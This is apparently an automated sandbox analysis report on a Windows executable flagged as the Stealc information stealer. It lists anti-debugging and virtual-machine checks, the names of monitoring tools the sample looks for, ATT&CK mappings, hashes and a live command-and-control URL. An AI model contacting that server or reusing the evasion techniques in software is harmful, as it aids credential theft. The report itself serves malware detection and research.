                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EEE7 second address: 88EEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F76A4C93C1Ch 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F6DF second address: 88F6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F76A540C8D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F6E9 second address: 88F6ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895ABD second address: 895AD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007F76A540C8D6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 jo 00007F76A540C8D6h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895AD5 second address: 895AF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C93C21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0236 second address: 4EF024C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A540C8DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF024C second address: 4EF0251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF02D7 second address: 4EF02F1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 26119F5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov bh, cl 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e mov dx, si 0x00000011 mov dh, al 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF02F1 second address: 4EF02F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, si 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF02F9 second address: 4EF032F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A540C8DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F76A540C8DCh 0x00000012 add ecx, 5F733D48h 0x00000018 jmp 00007F76A540C8DBh 0x0000001d popfd 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 611ACF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 60F1FE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 83953C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003C38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003C4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_003BDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_003BE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_003BED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_003C4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003BDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_003BBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003BF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_003C3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003B16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B1160 GetSystemInfo,ExitProcess,0_2_003B1160
                Source: file.exe, file.exe, 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1730462584.00000000010E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1730462584.00000000010B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13532
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13551
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13535
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13547
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13587
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B45C0 VirtualProtect ?,00000004,00000100,000000000_2_003B45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003C9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9750 mov eax, dword ptr fs:[00000030h]0_2_003C9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003C7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6392, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_003C9600
                Source: file.exe, file.exe, 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_003C7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_003C6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003C7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_003C7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.3b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1689272998.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6392, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.3b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1689272998.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6392, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phplfile.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpAfile.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.php0file.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/wsfile.exe, 00000000.00000002.1730462584.00000000010C7000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37sfile.exe, 00000000.00000002.1730462584.000000000106E000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.37
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1528602
                          Start date and time:2024-10-08 04:11:06 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 2m 52s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:1
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 84
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.94766212160313
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'806'336 bytes
                          MD5:dcbcbb7abc2724683097cb469b37c429
                          SHA1:785d9b8ecba52caae4fb1bec9761d5bb1cbff066
                          SHA256:d9efe6204be6eab5b04dc98ad054b27df5661cba2a11bc508ee27711686eb918
                          SHA512:c41d531732d3c5c2efc5f2a476816c3952534521c65d96e575e404469c951a4ee70bb10fbbe74ea273c681e85fd3c15b254b90e3b0e39dce982654f02d80c521
                          SSDEEP:49152:DUq93md4tTBOhbMdvShQ0ff2/aPox1MkxqTHJonCRIH3:D340OhbMdajf2SPSek4hKX
                          TLSH:098533141A51D531E5CA47B53E93DB29A72889869E536FE6ED1D3C2988CF78CF08F0C8
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                          File Icon

                          Icon Hash:90cececece8e8eb0

                          Static PE Info

                          General

                          Entrypoint:0xa85000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007F76A46E166Ah
                          movd mm3, dword ptr [ebx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [edi], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dl
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [edi], al
                          or al, byte ptr [eax]
                          add byte ptr [ecx], al
                          or al, byte ptr [eax]
                          add byte ptr [ecx], cl
                          or al, byte ptr [eax]
                          add byte ptr [edx], cl
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [edx], ecx
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Rich Headers

                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x25b0000x22800c218226f3fb5b724ce0165d15e640f89unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
